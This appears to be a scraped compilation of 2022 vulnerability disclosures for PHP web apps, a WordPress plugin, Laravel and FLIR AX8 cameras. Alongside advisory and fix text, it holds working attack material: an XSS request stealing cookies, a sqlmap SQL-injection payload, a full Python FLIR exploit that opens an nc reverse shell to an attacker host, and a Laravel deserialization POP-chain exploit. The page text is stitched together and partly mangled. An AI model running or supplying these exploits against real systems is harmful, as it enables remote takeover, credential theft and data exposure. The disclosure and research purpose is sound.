Clinic's Patient Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via patients.php.

Permalink

Cannot retrieve contributors at this time

**Title: Clinic's Patient Management System 1.0 Stored Cross-Site Scripting****Author: HeZhenKai****Date: 07.15.2022****Vendor: https://www.sourcecodester.com/users/tips23****Software:**

https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

#Description： #The Line 10 of patients.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

#echo $patients->address;

#PoC：

    POST /pms/patients.php HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Referer: http://192.168.1.19/pms/patients.php
    Cookie: _ga=GA1.1.1382961971.1655097107; PHPSESSID=cqb92r4af78v6laio9hqjs261t
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 160
    
    patient_name=1&address=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cnic=1&date_of_birth=07%2F21%2F2022&phone_number=1&gender=Male&save_Patient=

CVE-2022-36251: bug_report/XSS-1.md at main · ZhenKaiHe/bug_report

A vulnerability was found in SourceCodester Simple and Nice Shopping Cart Script. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /mkshop/Men/profile.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206845 was assigned to this vulnerability.

CVE-2022-2909

Transposh WordPress Translation versions 1.0.8.1 and below suffer from an incorrect authorization vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Transposh WordPress Translation  
Vendor URL:     https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/  
Type:           Incorrect Authorization [CWE-863]  
Date found:     2022-07-23  
Date published: 2022-08-16  
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)  
CVE:            CVE-2022-2536

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Transposh WordPress Translation 1.0.8.1 and below

4. INTRODUCTION  
===============  
Transposh translation filter for WordPress offers a unique approach to blog  
translation. It allows your blog to combine automatic translation with human  
translation aided by your users with an easy to use in-context interface.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
When installed, Transposh comes with a set of pre-configured options; one of these  
is the "Who can translate" setting under the "Settings" tab. However, this option  
is ignored if Transposh has enabled its "autotranslate" feature (it's enabled by  
default) and the HTTP POST parameter "sr0" is larger than 0. This is caused by a  
faulty validation in "wp/transposh_db.php":

if (!$by && !($all_editable &&  
        ($this->transposh->is_translator() || ($source > 0 && $this->transposh->options->enable_autotranslate)))) {  
    tp_logger("Unauthorized translation attempt " . $_SERVER['REMOTE_ADDR'], 1);  
    header("HTTP/1.0 401 Unauthorized translation");  
    exit;  
}

Successful exploits can allow an unauthenticated attacker to bypass the Transposh  
permissions and add translations to the WordPress site, thereby influencing what  
is shown on the site. However, this only affects new translations.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept adds a new translation

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: [host]  
Content-Length: 74  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
User-Agent: Mozilla/5.0  
Connection: close

action=tp_translation&ln0=en&sr0=1&items=1&tk0=translation&tr0=translation

7. SOLUTION  
===========  
None. Remove the plugin to prevent exploitation.

8. REPORT TIMELINE  
==================  
2022-07-23: Discovery of the vulnerability  
2022-07-23: CVE requested from Wordfence (CNA)  
2022-07-25: Wordfence assigns CVE-2022-2536  
2022-08-09: Sent note to vendor  
2022-08-09: Vendor is aware of this bug, but there is no plan to fix it yet  
2022-08-16: Public Disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

Transposh WordPress Translation 1.0.8.1 Incorrect Authorization

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS

jizhicms v2.3.1 has SQL injection in the background.

    POST /index.php/admins/Fields/get_fields.html HTTP/1.1
    Host: 192.168.10.130
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html
    Content-Length: 24
    Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158
    Connection: close
    
    molds=comment&tid=0&id=3
    

backstage->Interactive Management - > comment list, and grab a package  
  
  
use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch  

    ---
    Parameter: molds (POST)
        Type: stacked queries
        Title: MySQL >= 5.0.12 stacked queries (comment)
        Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3
    ---

CVE-2022-36578: jizhicms v2.3.1 has a vulnerability, SQL injection · Issue #78 · Cherry-toto/jizhicms

DolphinPHP 1.5.1 is vulnerable to Cross Site Scripting (XSS) via Background - > System - > system function - > configuration management.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37254: DolphinPHP v1.5.1 has a vulnerability, Stored Cross Site Scripting(XSS) · Issue #42 · caiweiming/DolphinPHP

FLIR AX8 versions 1.46.16 and below unauthenticated remote OS command injection exploit.

    # -*- coding: utf-8 -*-# Exploit Title: FLIR AX8 Unauthenticated OS Command Injection# Date: 8/19/2022# Exploit Author: Samy Younsi Naqwada (https://samy.link)# Vendor Homepage: https://www.flir.com/# Software Link: https://www.flir.com/products/ax8-automation/# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok# Version: 1.46.16 and under.# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)# CVE : CVE-2022-36266from __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport jsonimport urllib3urllib3.disable_warnings()def banner():  flirLogo = """ ███████╗██╗     ██╗██████╗ ██╔════╝██║     ██║██╔══██╗█████╗  ██║     ██║██████╔╝██╔══╝  ██║     ██║██╔══██╗██║     ███████╗██║██║  ██║ ╚═╝     ╚══════╝╚═╝╚═╝  ╚═╝                          .---------------------.   █████╗ ██╗  ██╗ █████╗  /--'--.------.--------/|  ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||  ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||  ██╔══██║ ██╔██╗ ██╔══██╗ |       |( () )|      ||  ██║  ██║██╔╝ ██╗╚█████╔╝ |       | `--` |      |/  ╚═╝  ╚═╝╚═╝  ╚═╝ ╚════╝  `-------`------`------`                                                                                                                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m                                                                 FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(flirLogo))def pingWebInterface(RHOST, RPORT):  url = 'http://{}:{}/login/'.format(RHOST, RPORT)  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)  try:    if response.status_code != 200:      print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')      exit()    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')    version = soup.find('p', id = 'login-title').string    print('[INFO] {} detected.'.format(version))  except:    print('[ERROR] Can\'t grab the device version...')def execReverseShell(RHOST, RPORT, LHOST, LPORT):  url = 'http://{}:{}/res.php'.format(RHOST, RPORT)  payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LPORT)  data = 'action=alarm&id=2;{}'.format(payload)  headers = {    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',  }  try:    print('[INFO] Executing reverse shell...')    response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)    print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))    return  except Exception as e:      print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)      return Falsedef main():  banner()  args = parser.parse_args()  pingWebInterface(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

FLIX AX8 1.46.16 Remote Command Execution

A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.

**Laravel5.1 POP4 RCE**

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"  
app/Http/Controllers/UsersController.php adding a controller UsersController

<?php
namespace App\\Http\\Controllers;
use Illuminate\\Http\\Request;
class UsersController extends Controller
{

    /\*\*
     \* 创建一个新用户。
     \*
     \* @param  Request  $request
     \* @return Response
     \*/
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload\=$request\->input("cmd");

        unserialize($payload);
        //
    }
}
?>

routes/web.php  
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

<?php
use Illuminate\\Support\\Facades\\Route;
/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route\==post('/test',\[\\App\\Http\\Controllers\\UsersController\==class,'store'\]);

**exp**

<?php
namespace Faker;
class DefaultGenerator{
	public $default;

}
namespace Carbon;
class Carbon{}

namespace Faker;
class Generator{
	protected $formatters = \[\];
	public function \_\_construct(){
		$this\->formatters\['huahua'\]='system';
	}
}

namespace Carbon;
use Carbon\\Carbon;
use Faker\\DefaultGenerator;
use Faker\\Generator;
class CarbonPeriod{
	protected $current;
	protected $dateClass;
	protected $filters = \[\];
	protected $key;
	public function \_\_construct(){
		$this\->dateClass\=new DefaultGenerator;
		$this\->dateClass\->default\=new DefaultGenerator;
		$this\->dateClass\->default\->default\='huahua';
		$this\->current\=new Carbon;
		$this\->filters\[\]\[\]=\[new Generator,'format'\];
		$this\->key\=array("calc.exe");
	}
}

namespace Illuminate\\View;
use Carbon\\CarbonPeriod;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new CarbonPeriod,'valid'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

CVE-2022-2886: Laravel5.1 POP4 RCE · Issue #3 · beicheng-maker/vulns

Cross Site Scripting (XSS) vulnerability exists in the phpgurukul Online Marriage Registration System 1.0 allows attackers to run arbitrary code via the wzipcode field.

**Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting**

**Platform:****PHP**

**Date:****2020-05-27**

  

    Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
    # Google Dork: N/A
    # Date: 2020-05-26
    # Exploit Author: that faceless coder(Inveteck Global)
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
    # Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting
    # Tested on: MAC OS MOJAVE v 10.14.6
    # CVE : N/A
    
    The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities: 
    
    if(isset($_POST['submit']))
      {
      
    $nofhusband=$_POST['nofhusband'];
    $hreligion=$_POST['hreligion'];
    $haddress=$_POST['haddress'];
    $hstate=$_POST['hstate'];
    
    $nofwife=$_POST['nofwife'];
    $wreligion=$_POST['wreligion'];
    $waddress=$_POST['waddress'];
    $wstate=$_POST['wstate'];
    $witnessnamef=$_POST['witnessnamef'];
    $waddressfirst=$_POST['waddressfirst'];
    $witnessnames=$_POST['witnessnames'];
    $waddresssec=$_POST['waddresssec'];
    $witnessnamet=$_POST['witnessnamet'];
    $waddressthird=$_POST['waddressthird'];
    
    $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
    $query=$dbh->prepare($sql);
    
    $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
    $query=$dbh->prepare($sql);
    $query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR);
    $query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR);
    $query->bindParam(':hdob',$hdob,PDO::PARAM_STR);
    $query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR);
    $query->bindParam(':haddress',$haddress,PDO::PARAM_STR);
    $query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR);
    $query->bindParam(':hstate',$hstate,PDO::PARAM_STR);
    $query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR);
    $query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR);
    $query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR);
    $query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR);
    $query->bindParam(':wdob',$wdob,PDO::PARAM_STR);
    $query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR);
    $query->bindParam(':waddress',$waddress,PDO::PARAM_STR);
    $query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR);
    $query->bindParam(':wstate',$wstate,PDO::PARAM_STR);
    $query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR);
    $query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR);
    $query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR);
    $query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR);
    $query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR);
    $query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR);
    $query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR);
     $query->execute();
    
       $LastInsertId=$dbh->lastInsertId();
       if ($LastInsertId>0) {
    
    echo '<script>alert("Registration form has been filled successfully.")</script>';
      }
      else
        {
             echo '<script>alert("Something Went Wrong. Please try again")</script>';
        }
    
    The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database

CVE-2020-23466: Offensive Security’s Exploit Database Archive

CandidATS Version 3.0.0 Beta allows an authenticated user to inject SQL queries in '/index.php?m=settings&a=show' via the 'userID' parameter, in '/index.php?m=candidates&a=show' via the 'candidateID', in '/index.php?m=joborders&a=show' via the 'jobOrderID' and '/index.php?m=companies&a=show' via the 'companyID' parameter

**Open Source Applicant Tracking System for Recruiters**

**CandidATS** is free and open source Applicant Tracking System for Recruiters. It helps from getting the order from company to placing the candidate. Tracking the interview process can be efficiently managed

Tag

#php